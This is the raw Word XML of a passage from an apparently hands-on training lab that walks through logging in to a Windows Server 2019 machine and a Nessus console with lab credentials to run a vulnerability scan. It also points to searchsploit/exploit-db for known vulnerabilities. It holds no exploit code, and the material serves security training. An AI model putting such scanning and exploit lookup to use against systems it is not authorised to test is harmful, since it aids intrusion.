          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advertisement Dept</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> using Nessus in Windows Server 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122885A3" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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t xml:space="preserve">You may additionally look for pre-existing vulnerabilities associated with the identified version of services/operating system in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/exploit-db.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379B77FC" w14:textId="251E21AB" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1"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22B1273C">
          <v:shape id="_x0000_i1303" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId17" w:name="DefaultOcxName5" w:shapeid="_x0000_i1303"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00D86EB7">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0067B8"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Windows Server 2019</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and click </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>HYPERLINK "https://labclient.labondemand.com/Instructions/52f4d542-434e-4a10-8f51-0c2b8ca1d32b?rc=10"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0067B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Ctrl+Alt+Delete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6256DA1C" w14:textId="15C613F2"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013ADE86" wp14:editId="295DFD2B">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="877635309" name="図 5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38FA3CAA" w14:textId="6BF6B546"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4A777739">
          <v:shape id="_x0000_i1302" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId20" w:name="DefaultOcxName6" w:shapeid="_x0000_i1302"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In the password field click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Pa$$w0rd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F60D16" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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t>You can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Type Password</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> option from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> menu to enter the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64610232" w14:textId="45783FFB"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6425968E" wp14:editId="5ECBA4A5">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2133509093" name="図 4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789E2615" w14:textId="574F2249"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="110DAA84">
          <v:shape id="_x0000_i1301" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId22" w:name="DefaultOcxName7" w:shapeid="_x0000_i1301"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Launch any web browser in this lab we are using </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Google Chrome</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> browser. To launch the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Google Chrome</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> browser, double-click the Google Chrome icon on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Desktop</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6627DF60" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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t>You can also click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Google Chrome</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> icon on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>taskbar</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> or launch it from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> menu apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B14782" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>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t>If you use a different browser then screenshots will differ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061113B5" w14:textId="724CA5D0"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54535721" wp14:editId="67DF0841">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="989667864" name="図 4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582DB32F" w14:textId="3988748B"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1C426A47">
          <v:shape id="_x0000_i1300" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId24" w:name="DefaultOcxName8" w:shapeid="_x0000_i1300"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Google Chrome browser appears, now type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://localhost:8834</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> in the address bar of the browser and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C400742" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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t>You can also click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Nessus Login bookmark</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> on the chrome browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F637279" w14:textId="226AE8BF"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3AF3DEBD" wp14:editId="5F2B7D18">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2089088207" name="図 4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552B83C4" w14:textId="5EFBA690"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38B4D44C">
          <v:shape id="_x0000_i1299" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId26" w:name="DefaultOcxName9" w:shapeid="_x0000_i1299"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Privacy error page appears, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advanced</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016AE121" w14:textId="0E43AD15"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C414712" wp14:editId="768959B7">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="994460624" name="図 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7C4B6A2E" w14:textId="3DF52EFB"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3F5040C0">
          <v:shape id="_x0000_i1298" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId28" w:name="DefaultOcxName10" w:shapeid="_x0000_i1298"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Proceed to localhost (unsafe)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74355394" w14:textId="49851BAF"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04D0DCF8" wp14:editId="6336D48D">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1649667726" name="図 4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3CD45DA9" w14:textId="5762CFD1"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5BB9DA0D">
          <v:shape id="_x0000_i1297" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId30" w:name="DefaultOcxName11" w:shapeid="_x0000_i1297"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Nessus/Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> page appears. Type the following credentials and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sign In</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Username: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>qwerty@123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A19F0D7" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>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t>If the login page does not appear, go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Control Panel</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
